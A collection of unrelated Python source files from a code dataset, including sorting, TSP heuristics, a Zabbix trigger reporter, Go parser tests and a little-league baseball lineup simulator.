try:
id = solutions.index(it)
del solutions[id]
return 1
except ValueError:
return 0
count = 0
multisol = []
while(solutions):
sol = solutions.pop(0)
multiplier = 1
multiplier += findAndDel(flipOverX(sol), count)
multiplier += findAndDel(flipOverXY(sol), count)
multiplier += findAndDel(flipOverY(sol), count)
multisol.append((sol, multiplier))
count += 1
return multisol
def reverseCount(hand, stones, colors, copies, cores):
# Initialize variables
maxhand = stones * copies * colors
to_remove = maxhand - hand
start = default_timer()
solutions = list()
cR = c_rummikub.cRummikub(cores, stones, colors, copies)
print("Initializing. n", stones, "k", colors, "m", copies, "c", cores, "h", hand)
# Generating a starting table
table = initTable(colors, stones, copies)
table = list(chain(*table))
init = default_timer()
print("Initialized. Time taken:", round(init - start,2), "\nFinding subsets...")
# Find unique subsets
findSubsets(solutions, table, to_remove)
subset = default_timer()
print("Found", len(solutions), "possible subsets. Time taken:", round(subset - init,2), "\nRemoving duplicates...")
# Removing duplicates
solutions = removeDups(solutions)
dups = default_timer()
print(len(solutions), "possible subsets left. Time taken:", round(dups - subset,2), "\nExecuting...")
# Execute the determined situations
result = cR.delegate(solutions)
execution = default_timer()
print("Execution done. Time taken:", round(execution - dups,2))
# Finalizing
stop = default_timer()
memory = memoryUsage()
print(writeResult(hand, stones, colors, copies, cores, [result, round(stop - start,2), memory, "botup"]))
print("Winning hands:", result)
if __name__ == '__main__':
stones = 6
maxhand = 48
minhand = 46#maxhand - 1
cores = 7
if len(argv) == 5:
maxhand = int(argv[1])
minhand = int(argv[2])
stones = int(argv[3])
cores = int(argv[4])
elif len(argv)>1 and len(argv) != 5:
print("Invalid amount of arguments. Must be either none or 4.")
quit()
for hand in reversed(range(minhand, maxhand+1)):
reverseCount(hand, stones, colors, copies, cores) | true |
9ce59f2b5c89391bbcfcb365761ca4272f7e06bf | Python | ManasveeMittal/dropbox | /DataStructures/DataStructureAndAlgorithmicThinkingWithPython-master/chapter03linkedlists/LinkedListSortingWithMergeSort.py | UTF-8 | 2,102 | 3.234375 | 3 | [
"MIT"
] | permissive | # Copyright (c) Dec 22, 2014 CareerMonk Publications and others.
# E-Mail : info@careermonk.com
# Creation Date : 2014-01-10 06:15:46
# Last modification : 2008-10-31
# by : Narasimha Karumanchi
# Book Title : Data Structures And Algorithms Made In Java
# Warranty : This software is provided "as is" without any
# warranty; without even the implied warranty of
# merchantability or fitness for a particular purpose.
# Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.data = x
self.next = None
class LinkedListSortWithMergeSort:
# @param head, a ListNode
# @return a ListNode
def sortList(self, head):
if head == None:
return None
counter = 0
temp = head
while temp != None:
temp = temp.next
counter += 1
return self.sort(head, counter)
def sort(self, head, size):
if size == 1:
return head
list2 = head
for i in range(0, size // 2):
list2 = list2.next
list1 = self.sort(head, size // 2)
list2 = self.sort(list2, size - size // 2)
return self.merge(list1, size // 2, list2, size - size // 2)
def merge(self, list1, sizeList1, list2, sizeList2):
dummy = ListNode(0)
list = dummy
pointer1 = 0
pointer2 = 0
while pointer1 < sizeList1 and pointer2 < sizeList2:
if list1.data < list2.data:
list.next = list1
list1 = list1.next
pointer1 += 1
else:
list.next = list2
list2 = list2.next
pointer2 += 1
list = list.next
while pointer1 < sizeList1:
list.next = list1
list1 = list1.next
pointer1 += 1
list = list.next
while pointer2 < sizeList2:
list.next = list2
list2 = list2.next
pointer2 += 1
list = list.next
list.next = None
return dummy.next
| true |
f1ed75467fcd6744532075ac64870bcb3af090e6 | Python | KowsalyaS18/task2 | /listsum.py | UTF-8 | 187 | 3.296875 | 3 | [] | no_license | def my_func(list1):
print(sum(list1))
list1=[]
n=int(input("enter the list size"))
for i in range(0,n):
item=int(input())
list1.append(item)
print (list1)
my_func(list1)
| true |
43cd15729ac318c3300295b9486786a2e341c549 | Python | Kelly901/LenguajesFormales_T1 | /7Ejercicio.py | UTF-8 | 258 | 3.40625 | 3 | [
"Apache-2.0"
] | permissive | def is_leap(year):
leap = False
if year==1800 or year==1900 or year==2100 or year==2200 or year==2300 or year==2500:
return False
elif (year%4)==0 or year%400==0:
return True
return leap
year = int(raw_input()) | true |
0c6f12206efd92f62687ee656b03686bb8888c51 | Python | erik-stephens/xibbaz | /xibbaz/cmd/triggers.py | UTF-8 | 1,908 | 2.84375 | 3 | [
"MIT"
] | permissive | #! /usr/bin/env python3
"""
Report trigger status. Number of problems is exit code.
Usage: COMMAND [options] [<host>]
Arguments:
- host: zabbix hostname to report problems for. All hosts by default.
Options:
-v, --verbose
Report status of all checks, not just current problems, but only when a
host is given.
-p, --min-priority LEVEL
Report these triggers only: all, info, warn, avg, high, disaster [default: info]
--api URL
Zabbix API endpoint (defaults to ZABBIX_API from environment)
"""
from . import *
def description(trigger):
"""
Substitute some important macros, namely `{HOST.NAME}`.
"""
s = trigger.description.val
if trigger.hosts:
s = s.replace('{HOST.NAME}', ', '.join(i.text for i in trigger.hosts))
return s
def main(argv):
opts = docopt(__doc__, argv)
hostname = opts.get('<host>')
verbose = opts.get('--verbose')
min_priority = dict(
all = 0,
info = 1,
warn = 2,
avg = 3,
high = 4,
disaster = 5,
).get(opts['--min-priority'])
if min_priority is None:
print('invalid --min-priority', file=sys.stderr)
sys.exit(1)
api = login(opts.get('--api'))
params = dict()
if hostname:
host = api.host(hostname)
params['hostids'] = [host.id]
else:
params['only_true'] = 1
params['active'] = 1
params['monitored'] = 1
status = 0
for t in sorted(api.triggers(**params), key = lambda i: (i.value.val, i.priority.val), reverse=True):
if t.priority.val >= min_priority:
problematic = t.value.val > 0
if problematic:
status += 1
if verbose or problematic:
print("{:8} {:12} {:25} {}".format(t.value, t.priority, t.hosts[0], description(t)))
sys.exit(status)
if __name__ == '__main__':
main(sys.argv[1:])
| true |
78d1f534be505b860dd5382aa1addb09859c8472 | Python | daniel-reich/ubiquitous-fiesta | /28mJ6NgqbQS4YRgDc_18.py | UTF-8 | 419 | 2.671875 | 3 | [] | no_license |
def can_pay_cost(mana_pool, cost):
dgt = ''.join(i for i in cost if i.isdigit())
alp = ''.join(i for i in cost if i.isalpha())
cst = int(dgt) if len(dgt) > 0 else 0
for a in alp:
if a in mana_pool:
alp = alp.replace(a, '', 1)
mana_pool = mana_pool.replace(a, '', 1)
else:
return False
rem_c = cst*'1'+alp
return len(mana_pool) >= len(rem_c)
| true |
a16dedf52a3f219cf5b01ff607f0bc343c1418c4 | Python | JuanOlivella/OlivellaJuan_S6C0LAB | /OlivellaJuan_plotsRK.py | UTF-8 | 427 | 3 | 3 | [] | no_license | import numpy as np
import matplotlib.pylab as plt
datos1=np.genfromtxt("datosRK.dat")
x1 = datos1[:,0]
y1 = datos1[:,1]
error1 = datos1[:,2]
plt.figure()
plt.plot(x1,y1)
plt.title("Solucion con el metodo de RK")
plt.xlabel("$x$")
plt.ylabel("$y(x)$")
plt.savefig("SolucionRK.pdf")
plt.figure()
plt.plot(x1,error1)
plt.title("Error con el metodo de RK")
plt.xlabel("$x$")
plt.ylabel("$Error$")
plt.savefig("ErrorRK.pdf")
| true |
66af64d490fc055dac126515aa7e0f4e8ceda824 | Python | Aasthaengg/IBMdataset | /Python_codes/p03651/s782605497.py | UTF-8 | 257 | 2.8125 | 3 | [] | no_license | n,k,*a=map(int,open(0).read().split())
from fractions import gcd
G=a[0]
for i in a:
G=gcd(G,i)
A=max(a)
if k>A:
print("IMPOSSIBLE")
exit()
while A>0:
if k==A:
print("POSSIBLE")
exit()
A-=G
print("IMPOSSIBLE") | true |
0b70993d11f723d8fe5ad684689c4d6386bd41a8 | Python | janaleible/hotpotQA-ir-task | /services/run.py | UTF-8 | 2,744 | 2.75 | 3 | [] | no_license | import json
import sqlite3
from typing import Dict, List
from tqdm import tqdm
import main_constants as constants
from retrieval.term.dataset import Dataset
from services import helpers
class Run(dict):
def add_ranking(self, _id: str, ranking: Dict[str, float]) -> None:
self[_id] = ranking
def update_ranking(self, question_id: str, document_title: str, score: float) -> None:
if question_id not in self:
self[question_id] = {}
assert self[question_id].get(document_title, -1) == -1, f'Ranking already ' \
f'exists {question_id}.{document_title}={self[question_id][document_title]}'
self[question_id][document_title] = score
def update_rankings(self, rankings: Dict[str, Dict[str, float]]) -> None:
for _id in rankings.keys():
if _id in self:
self[_id].update(rankings[_id])
else:
self[_id] = rankings[_id]
def write_to_file(self, path) -> None:
with open(path, 'w', encoding='utf-8') as file:
json.dump(self, file)
def to_json(self, db, dataset_path) -> List[dict]:
helpers.log('Creating hotpot data.')
dataset = Dataset.from_file(dataset_path)
questions = []
connection = sqlite3.connect(db)
cursor = connection.cursor()
doc_results = cursor.execute(f"SELECT DISTINCT doc_title, document_text FROM features").fetchall()
title2text = {json.loads(doc_title): json.loads(doc_text) for (doc_title, doc_text) in doc_results}
cursor.close()
connection.close()
helpers.log('Loaded title2text.')
for question_id, ranking in tqdm(self.items()):
context = []
sorted_by_score = sorted(ranking.items(), key=lambda value: value[1], reverse=True)
for rank in range(min(10, len(ranking))):
(title, score) = sorted_by_score[rank]
doc_text = title2text[title]
article = [paragraph.split(constants.EOS.strip()) for paragraph in
doc_text.split(constants.EOP.strip())]
article.insert(0, title)
article.insert(1, score)
context.append(article)
full_question = dataset.find_by_id(question_id)
question = {
'_id': full_question.id,
'level': full_question.level,
'type': full_question.type,
'question': full_question.question,
'context': context,
'answer': full_question.answer,
'supporting_facts': full_question.supporting_facts
}
questions.append(question)
return questions
| true |
43f7ab2db223256712ec02c9ba7a27b7e33ef5cc | Python | k018c1098/kadai | /kadai/kadai5-2.py | UTF-8 | 464 | 2.5625 | 3 | [] | no_license | import datetime
from flask import Flask, render_template, request
app = Flask(__name__)
a=[]
@app.route('/')
def index():
return render_template('index6.html')
@app.route('/', methods=['POST'])
def index1():
b = datetime.datetime.now()
b = b.strftime('%m/%d %H:%M 歩数 :')
msg = request.form.get('msg')
a.append( b + msg )
return render_template('index6.html', c = a )
if __name__ == '__main__':
app.debug = True
app.run()
| true |
157144d524f82bc987543c551484dba7454608e7 | Python | Gangneng/edumeet | /djangoProject/edumeet/views.py | UTF-8 | 1,368 | 2.671875 | 3 | [] | no_license | from django.shortcuts import render
from datetime import datetime
import calendar
# https://blog.miguelgrinberg.com/post/video-streaming-with-flask/page/8
def main_cam(request):
##### 달력 만들기 ####
cal_Y = str(datetime.today().year)
cal_M = str(datetime.today().month)
weakname = ['Sunday','Monday','Tuesday','Wednesday','Thursday','Friday','Saturday']
#월 첫째날 요일 계산하기
now = datetime.today()
day_first = now.replace(day=1)
weekday_first = day_first.weekday()
day_last = calendar.monthrange(now.year,now.month)
if weekday_first == 6 :
weekday_first = 0
else:
weekday_first += 1
bigcalendar = []
calendarmaker = [0]*weekday_first
for i in range(1,day_last[1]+1):
calendarmaker.append(i)
if len(calendarmaker) == 7:
bigcalendar.append(calendarmaker)
calendarmaker = []
if calendarmaker:
bigcalendar.append(calendarmaker)
if len(bigcalendar[-1]) != 7:
for i in range(1,len(bigcalendar[-1])):
bigcalendar[-1].append(0)
#### 달력 만들기 끝 ####
#보넬 정보 딕 #
context = {
"weakname":weakname ,
"cal_Y":cal_Y,
"cal_M" : cal_M ,
"bigcalendar":bigcalendar,}
return render(request, "cam/player.html", context=context)
| true |
a8cde9391906519f134719ff5e2d0af9939f478a | Python | bridgesmith17/Algorithms_CS325 | /Project4/tsp.py | UTF-8 | 8,585 | 3.359375 | 3 | [] | no_license | #!/usr/bin/env python
from os import path
import time
import os
import sys
import math
import random
import copy
#function returns the rounded distace between two points.
def dist(pI, pII):
out = math.sqrt((pI[0] - pII[0])**2 + (pI[1] - pII[1])**2)
return int(round(out))
#helper function to pass coordinates inside array to dist function
def inDist(pI, pII):
return dist(pI[1], pII[1])
#greedy path, uses list in order given to find the next closest location and add to path
#based on :https://en.wikipedia.org/wiki/Nearest_neighbour_algorithm
def tspNN(pointsArray, start):
travelDist = 0
start = pointsArray[start]
visitPath = pointsArray
path = [start]
visitPath.remove(start)
while visitPath:
next = min(visitPath, key=lambda x: inDist(path[-1], x))
travelDist += inDist(path[-1], next)
path.append(next)
visitPath.remove(next)
#add in final distance from last to first location
travelDist += inDist(path[0], path[-1])
return path, travelDist
#getDist loops though ordered array of tsp path to calcualted the total distance traveled
def getDist(pointsArray):
i = 1
travelDist = 0
while i <= len(pointsArray)-1:
travelDist += inDist(pointsArray[i-1], pointsArray[i])
i+=1
travelDist += inDist(pointsArray[0], pointsArray[-1])
return travelDist
#two opt pulls checks and compares two the distance of two points and swaps if necessary to get the shortest path
#based on: https://en.wikipedia.org/wiki/2-opt, https://github.com/ntrifunovic/TSP/blob/master/tsp.py
def two_opt(pointsArray):
for i in range(len(pointsArray) - 1):
for j in range(i + 2, len(pointsArray) - 1):
if (inDist(pointsArray[i], pointsArray[i+1]) + inDist(pointsArray[j], pointsArray[j+1]) > inDist(pointsArray[i], pointsArray[j]) + inDist(pointsArray[i+1], pointsArray[j+1])):
pointsArray[i+1:j+1] = reversed(pointsArray[i+1:j+1])
dist = getDist(pointsArray)
return pointsArray, dist
#three opt similar to 2-opt checks three distances at a time to find the shortest path
#based on: https://en.wikipedia.org/wiki/3-opt, https://github.com/ntrifunovic/TSP/blob/master/tsp.py
def three_opt(pointsArray):
for i in range(len(pointsArray) - 1):
for j in range(i + 2, len(pointsArray) - 1):
for k in range(j + 2, len(pointsArray) - 1):
way = 0
current = inDist(pointsArray[i], pointsArray[i + 1]) + inDist(pointsArray[j], pointsArray[j + 1]) + inDist(pointsArray[k], pointsArray[k + 1])
if current > inDist(pointsArray[i], pointsArray[i + 1]) + inDist(pointsArray[j], pointsArray[k]) + inDist(pointsArray[j + 1], pointsArray[k + 1]):
current = inDist(pointsArray[i], pointsArray[i + 1]) + inDist(pointsArray[j], pointsArray[k]) + inDist(pointsArray[j + 1], pointsArray[k + 1])
way = 1
if current > inDist(pointsArray[i], pointsArray[j]) + inDist(pointsArray[i + 1], pointsArray[j + 1]) + inDist(pointsArray[k], pointsArray[k + 1]):
current = inDist(pointsArray[i], pointsArray[j]) + inDist(pointsArray[i + 1], pointsArray[j + 1]) + inDist(pointsArray[k], pointsArray[k + 1])
way = 2
if current > inDist(pointsArray[i], pointsArray[j]) + inDist(pointsArray[i + 1], pointsArray[k]) + inDist(pointsArray[j + 1], pointsArray[k + 1]):
current = inDist(pointsArray[i], pointsArray[j]) + inDist(pointsArray[i + 1], pointsArray[k]) + inDist(pointsArray[j + 1], pointsArray[k + 1])
way = 3
if current > inDist(pointsArray[i], pointsArray[j + 1]) + inDist(pointsArray[k], pointsArray[i + 1]) + inDist(pointsArray[j], pointsArray[k + 1]):
current = inDist(pointsArray[i], pointsArray[j + 1]) + inDist(pointsArray[k], pointsArray[i + 1]) + inDist(pointsArray[j], pointsArray[k + 1])
way = 4
if current > inDist(pointsArray[i], pointsArray[j + 1]) + inDist(pointsArray[k], pointsArray[j]) + inDist(pointsArray[i + 1], pointsArray[k + 1]):
current = inDist(pointsArray[i], pointsArray[j + 1]) + inDist(pointsArray[k], pointsArray[j]) + inDist(pointsArray[i + 1], pointsArray[k + 1])
way = 5
if current > inDist(pointsArray[i], pointsArray[k]) + inDist(pointsArray[j + 1], pointsArray[i + 1]) + inDist(pointsArray[j], pointsArray[k + 1]):
current = inDist(pointsArray[i], pointsArray[k]) + inDist(pointsArray[k], pointsArray[i + 1]) + inDist(pointsArray[j], pointsArray[k + 1])
way = 6
if current > inDist(pointsArray[i], pointsArray[k]) + inDist(pointsArray[j + 1], pointsArray[j]) + inDist(pointsArray[i + 1], pointsArray[k + 1]):
current = inDist(pointsArray[i], pointsArray[k]) + inDist(pointsArray[j + 1], pointsArray[j]) + inDist(pointsArray[i + 1], pointsArray[k + 1])
way = 7
if way == 1:
pointsArray[j + 1: k + 1] = reversed(pointsArray[j + 1: k + 1])
elif way == 2:
pointsArray[i + 1: j + 1] = reversed(pointsArray[i + 1: j + 1])
elif way == 3:
pointsArray[i + 1: j + 1], pointsArray[j + 1: k + 1] = reversed(pointsArray[i + 1: j + 1]), reversed(pointsArray[j + 1: k + 1])
elif way == 4:
pointsArray = pointsArray[: i + 1] + pointsArray[j + 1: k + 1] + pointsArray[i + 1: j + 1] + pointsArray[k + 1: ]
elif way == 5:
temp = pointsArray[: i + 1] + pointsArray[j + 1: k + 1]
temp += reversed(pointsArray[i + 1: j + 1])
temp += pointsArray[k + 1: ]
pointsArray = temp
elif way == 6:
temp = pointsArray[: i + 1]
temp += reversed(pointsArray[j + 1: k + 1])
temp += pointsArray[i + 1: j + 1]
temp += pointsArray[k + 1: ]
pointsArray = temp
elif way == 7:
temp = pointsArray[: i + 1]
temp += reversed(pointsArray[j + 1: k + 1])
temp += reversed(pointsArray[i + 1: j + 1])
temp += pointsArray[k + 1: ]
pointsArray = temp
dist = getDist(pointsArray)
return pointsArray, dist
#uses tspNN function and adds a random start point to find the best path, varies number of random starts based on size of input to reduce time of operation
def randScale(pointsArray):
min_dist= 100000000
n = len(pointsArray)-1
if n > 10000:
r = 5
elif n > 4000:
r = 10
elif n > 1000:
r = 20
elif n > 50:
r = 50
else:
r = n
for i in range(r):
x = random.randint(0,n)
pointsArray, dist = tspNN(pointsArray, x)
if (dist < min_dist):
min_dist = dist
min_array = copy.copy(pointsArray)
print (i)
return pointsArray, min_dist
#main function reads input file with path, inserts into array and passes to tsp function. It then creats output file of best path found by algorithm
def main (importFile):
#open test problem file and import
if (path.isfile(importFile)):
testFile = open(importFile, 'r')
tspArray = []
#import file line into tspArray in form [city, [x, y]]
for line in testFile:
newLine = line.rstrip('\n')
newLine = newLine.rstrip('\r')
newLine = newLine.split()
coord = [int(newLine[1]), int(newLine[2])]
temp = [newLine[0], coord]
tspArray.append(temp)
testFile.close()
#time and call tsp function
start = time.time()
tspF, distance = randScale(tspArray)
print(time.time()-start)
splt = importFile.split('.')
outFile = ".tour"
outFile = importFile+outFile
#open output file for writing
if(path.isfile(outFile)):
os.remove(outFile)
NewFile = open(outFile, 'w')
NewFile.write("%d\n" % distance)
for x in range(len(tspF)):
NewFile.write("%s\n" % tspF[x][0])
NewFile.close()
args = len(sys.argv)
if args <= 1 or args > 2:
print("Usage: tsp.py <inputfile>")
else:
main(str(sys.argv[1]))
| true |
83d7f232a388bb831f29b57138c9169c40857a25 | Python | excitoon-favorites/lizard | /test/test_languages/testGo.py | UTF-8 | 2,340 | 2.78125 | 3 | [
"MIT"
] | permissive | import unittest
import inspect
from lizard import analyze_file, FileAnalyzer, get_extensions
def get_go_function_list(source_code):
return analyze_file.analyze_source_code(
"a.go", source_code).function_list
class Test_parser_for_Go(unittest.TestCase):
def test_empty(self):
functions = get_go_function_list("")
self.assertEqual(0, len(functions))
def test_no_function(self):
result = get_go_function_list('''
for name in names {
print("Hello, \(name)!")
}
''')
self.assertEqual(0, len(result))
def test_one_function(self):
result = get_go_function_list('''
func sayGoodbye() { }
''')
self.assertEqual(1, len(result))
self.assertEqual("sayGoodbye", result[0].name)
self.assertEqual(0, result[0].parameter_count)
self.assertEqual(1, result[0].cyclomatic_complexity)
def test_one_with_parameter(self):
result = get_go_function_list('''
func sayGoodbye(personName string, alreadyGreeted chan bool) { }
''')
self.assertEqual(1, len(result))
self.assertEqual("sayGoodbye", result[0].name)
self.assertEqual(2, result[0].parameter_count)
def test_one_function_with_return_value(self):
result = get_go_function_list('''
func sayGoodbye() string { }
''')
self.assertEqual(1, len(result))
self.assertEqual("sayGoodbye", result[0].name)
def test_one_function_with_complexity(self):
result = get_go_function_list('''
func sayGoodbye() { if ++diceRoll == 7 { diceRoll = 1 }}
''')
self.assertEqual(2, result[0].cyclomatic_complexity)
def test_interface(self):
result = get_go_function_list('''
type geometry interface{
area() float64
perim() float64
}
func sayGoodbye() { }
''')
self.assertEqual(1, len(result))
self.assertEqual("sayGoodbye", result[0].name)
def test_interface_followed_by_a_class(self):
result = get_go_function_list('''
type geometry interface{
area() float64
perim() float64
}
class c { }
''')
self.assertEqual(0, len(result))
| true |
92c99985f5db11082a1c5a366f0b90e6ced4451e | Python | wow-kim/Algorithm | /Programmers/2단계_점프와_순간_이동.py | UTF-8 | 215 | 2.953125 | 3 | [] | no_license | def solution(n):
count = 0
while(n>0):
d,m = divmod(n,2)
if m == 1 : count += 1
n = d
return count
#-------------------------------
def solution(n):
return bin(n).count('1') | true |
e7d1298713f5496b24944b4a66b012de2f4e543e | Python | spacewander/AlgorithmAndDataStructure | /python/test_numeric.py | UTF-8 | 492 | 2.96875 | 3 | [] | no_license | import pytest
import numeric as n
@pytest.fixture
def ary():
return [1, 2, 3]
def test_itoa():
g = n.itoa(1)
assert 1 == g.next()
assert 2 == g.next()
def test_accumulate(ary):
assert n.accumulate(ary, 1, lambda x, y : x * y) == 6
def test_inner_product(ary):
assert n.inner_production(ary, ary, 0) == 14
def test_adjacent_difference(ary):
assert n.adjacent_difference(ary) == [1, 1, 1]
def test_partial_sum(ary):
assert n.partial_sum(ary) == [1, 3, 6]
| true |
70c595b53321f19e237841a506ef062ad045ac60 | Python | jimmycfa/baseball_simulation | /Baseball_Lineup.py | UTF-8 | 15,201 | 3.09375 | 3 | [] | no_license |
# coding: utf-8
# For little leage with max run limits per inning, the normal baseball lineup strategies don't work
# This is an attempt to figure out the best lineup given on base percentages for the kids
# 'll be the first to admit they are kids and they should be having fun which, is why no kids contributed to the making of this
# #analysis. But I'm their coach and I like learning new tools so it was a nice intersection of the two interests.
#
# 10 Permute 10 is 3,628,800. One option would be to Monte Carlo all 3.629 million possibilities for lineup
# The other is using a Genetic Algorithm...
# If we think of bases and whether someone is on it as states we have the following 8 possibilities.
# b1 b2 b3
# 0 0 0 --> empty bases
# 1 0 0 --> someone on first
# 0 1 0
# 1 1 0
# 0 0 1
# 1 0 1
# 0 1 1
# 1 1 1
#
# If the current state is 000 and someone hits a single then it would transition to 001. Runs occur on certain state transitions. If we have 001 and someone hits a single then the states would go to 100 and the number of runs would increment.
# In[28]:
import numpy as np
import pandas as pd
from enum import Enum
#import simpy
from copy import deepcopy
# In[29]:
#In Coach pitch At Bats (AB) is the same as Plate Apperances (PA) since there are no walks, hit by pitch, etc.
class Player:
p1b = 1.0
p2b = 1.0
p3b = 0.0
phr = 0.0
pso = 0.0 #struck out
pbo = 0.0 #hit but thrown out at first (useful for advancing a player)
def __init__(self, hit_probs):
self.p1b, self.p2b, self.p3b, self.phr, self.pso, self.pbo = hit_probs
if ((self.p1b + self.p2b + self.p3b + self.phr + self.pso + self.pbo) != 1.0):
print("Error with setting player")
print(hit_probs)
print((self.p1b + self.p2b + self.p3b + self.phr + self.pso + self.pbo))
self.hit_probs = [self.p1b, self.p2b, self.p3b, self.phr, self.pso, self.pbo]
def get_hit(self):
return np.random.choice(['p1b','p2b','p3b','phr','pso','pbo'], 1,
p = self.hit_probs)
# In[44]:
df = pd.DataFrame(data = [], columns = ['Inning', 'Runs', 'Outs', 'Inning Runs'])
OUTS = 3
MAX_RUNS = 5
MAX_INNINGS = 4
'''
#1B , 2B , 3B , HR , SO , BO
players =[Player([0.7, 0.3, 0.0, 0.0, 0.0, 0.0]),
Player([0.5, 0.0, 0.0, 0.0, 0.0, 0.5]),
Player([0.5, 0.5, 0.0, 0.0, 0.0, 0.0]),
Player([0.4, 0.0, 0.0, 0.0, 0.0, 0.6]),
Player([0.5, 0.5, 0.0, 0.0, 0.0, 0.0]),
Player([0.6, 0.4, 0.0, 0.0, 0.0, 0.0]),
Player([0.4, 0.0, 0.0, 0.0, 0.0, 0.6]),
Player([0.8, 0.0, 0.0, 0.0, 0.0, 0.2]),
Player([0.5, 0.5, 0.0, 0.0, 0.0, 0.0]),
Player([0.7, 0.3, 0.0, 0.0, 0.0, 0.0])]
'''
players =[Player([0.5, 0.0, 0.0, 0.0, 0.0, 0.5]),
Player([1.0, 0.0, 0.0, 0.0, 0.0, 0.0]),
Player([1.0, 0.0, 0.0, 0.0, 0.0, 0.0]),
Player([0.5, 0.0, 0.0, 0.0, 0.0, 0.5]),
Player([1.0, 0.0, 0.0, 0.0, 0.0, 0.0]),
Player([1.0, 0.0, 0.0, 0.0, 0.0, 0.0]),
Player([1.0, 0.0, 0.0, 0.0, 0.0, 0.0]),
Player([0.5, 0.0, 0.0, 0.0, 0.0, 0.5]),
Player([1.0, 0.0, 0.0, 0.0, 0.0, 0.0]),
Player([1.0, 0.0, 0.0, 0.0, 0.0, 0.0])]
#
#
# for sim_runs in range(0,1000):
# runs = 0
# inning = 1
# current_batter = 0
# bases = [0,0,0] #b1, b2, b3
# outs = 0
# start_runs = 0
#
# while inning <= MAX_INNINGS:
# batting = True
# result = players[current_batter % len(players)].get_hit()
# current_batter = current_batter + 1
# if (result == 'pbo') or (result == 'pso'):
# outs = outs + 1
# if (outs == 3):
# #max outs advance inning
# df.loc[sim_runs*MAX_INNINGS + inning] = (inning, runs, outs, runs - start_runs)
# inning = inning + 1
# bases = [0,0,0]
# outs = 0
# start_runs = runs
# elif (result == 'pbo'):
# if (bases[2]):
# runs = runs + 1
# bases[2] = bases[1]
# bases[1] = bases[0]
# bases[0] = 0
# #max runs advance inning
# if ((runs - start_runs)%MAX_RUNS == 0):
# df.loc[sim_runs*MAX_INNINGS + inning] = (inning, runs, outs, runs - start_runs)
# inning = inning + 1
# bases = [0,0,0]
# outs = 0
# start_runs = runs
# else:
# bases[2] = bases[1]
# bases[1] = bases[0]
# bases[0] = 0
# elif (result == 'p1b'):
# if (bases[2]):
# runs = runs + 1
# bases[2] = bases[1]
# bases[1] = bases[0]
# bases[0] = 1
# #max runs advance inning
# if ((runs - start_runs)%MAX_RUNS == 0):
# df.loc[sim_runs*MAX_INNINGS + inning] = (inning, runs, outs, runs - start_runs)
# inning = inning + 1
# bases = [0,0,0]
# outs = 0
# start_runs = runs
# else:
# bases[2] = bases[1]
# bases[1] = bases[0]
# bases[0] = 1
# elif (result == 'p2b'):
# if (bases[2] or bases[1]):
# runs = min(runs + bases[2] + bases[1],start_runs + MAX_RUNS)
# bases[2] = bases[0]
# bases[1] = 1
# bases[0] = 0
# #max runs advance inning
# if ((runs - start_runs)%MAX_RUNS == 0):
# df.loc[sim_runs*MAX_INNINGS + inning] = (inning, runs, outs, runs - start_runs)
# inning = inning + 1
# bases = [0,0,0]
# outs = 0
# start_runs = runs
# else:
# bases[2] = bases[0]
# bases[1] = 1
# bases[0] = 0
# elif (result == 'p3b'):
# if (bases[2] or bases[1] or bases[0]):
# runs = min(runs + bases[2] + bases[1] + bases[0],start_runs + MAX_RUNS)
# bases[2] = 1
# bases[1] = 0
# bases[0] = 0
# #max runs advance inning
# if ((runs - start_runs)%MAX_RUNS == 0):
# df.loc[sim_runs*MAX_INNINGS + inning] = (inning, runs, outs, runs - start_runs)
# inning = inning + 1
# bases = [0,0,0]
# outs = 0
# start_runs = runs
# else:
# bases[2] = 1
# bases[1] = 0
# bases[0] = 0
# elif (result == 'phr'):
# runs = min(runs + bases[2] + bases[1] + bases[0] + 1,start_runs + MAX_RUNS)
# bases[2] = 0
# bases[1] = 0
# bases[0] = 0
# #max runs advance inning
# if ((runs - start_runs)%MAX_RUNS == 0):
# df.loc[sim_runs*MAX_INNINGS + inning] = (inning, runs, outs, runs - start_runs)
# inning = inning + 1
# bases = [0,0,0]
# outs = 0
# start_runs = runs
# %matplotlib notebook
# ax = df[df.Inning == 4]['Runs'].hist()
# ax.set_xlabel('Number of Runs')
# ax.set_title('Histogram of Number of Runs over Four Innings (1000 Monte Carlo Runs)')
# print(df[df.Inning == 4]['Runs'].sum()/df[df.Inning == 4]['Runs'].count())
# In[21]:
class BaseBallAction(Enum):
Single = 1
Double = 2
Triple = 3
HomeRun = 4
StrikeOut = 5
ThrownOut = 6
class BaseballState():
def __init__(self, inning, runs, outs, base3, base2, base1, inning_start_runs = 0.0, likelihood = 1.0):
self.inning = inning
self.runs = runs
self.inning_start_runs = inning_start_runs
self.outs = outs
self.base3 = base3
self.base2 = base2
self.base1 = base1
self.likelihood = likelihood
def __repr__(self):
return "Inning: {}, Runs: {}, Inning Start Runs: {}, \n Outs: {}, First: {}, Second: {}, Third: {}, \n Likelihood: {}".format(self.inning, self.runs, self.inning_start_runs, self.outs, self.base1, self.base2, self.base3, self.likelihood)
def reset_bases(self):
self.base1 = 0
self.base2 = 0
self.base3 = 0
def increment_inning(self):
self.inning = self.inning + 1
self.reset_bases()
self.outs = 0
self.inning_start_runs = self.runs
def advance_bases(self, count, new_runner):
while(count != 0):
if (self.base3):
self.runs = self.runs + 1
self.base3 = self.base2
self.base2 = self.base1
self.base1 = new_runner
#max runs advance inning
if ((self.runs - self.inning_start_runs)%MAX_RUNS == 0):
self.increment_inning()
break
else:
self.base3 = self.base2
self.base2 = self.base1
self.base1 = new_runner
new_runner = 0 #only new runner first time through
count = count - 1
def next_state(self,action, action_probability):
new_state = deepcopy(self)
new_state.likelihood = new_state.likelihood*action_probability
if (action == BaseBallAction.StrikeOut) or (action == BaseBallAction.ThrownOut):
new_state.outs = new_state.outs + 1
if (new_state.outs == 3):
#max outs advance inning
new_state.increment_inning()
elif (action == BaseBallAction.ThrownOut): #don't always advance base but will here...also usually throw to first
new_state.advance_bases(count = 1, new_runner = 0)
elif (action == BaseBallAction.Single):
new_state.advance_bases(count = 1, new_runner = 1)
elif (action == BaseBallAction.Double):
new_state.advance_bases(count = 2, new_runner = 1)
elif (action == BaseBallAction.Triple):
new_state.advance_bases(count = 3, new_runner = 1)
elif (action == BaseBallAction.HomeRun):
new_state.advance_bases(count = 4, new_runner = 1)
return new_state
# In[ ]:
#start_state = BaseballState(1,0,0,0,0,0)
#current_player_idx = 0
#Loop over all the players and fill out the multi-hypothesis likelihoods
# states = [start_state]
# final_states = []
# num_iter = 0
# while(1):
# num_iter = num_iter+1
# num_old_states = len(states)
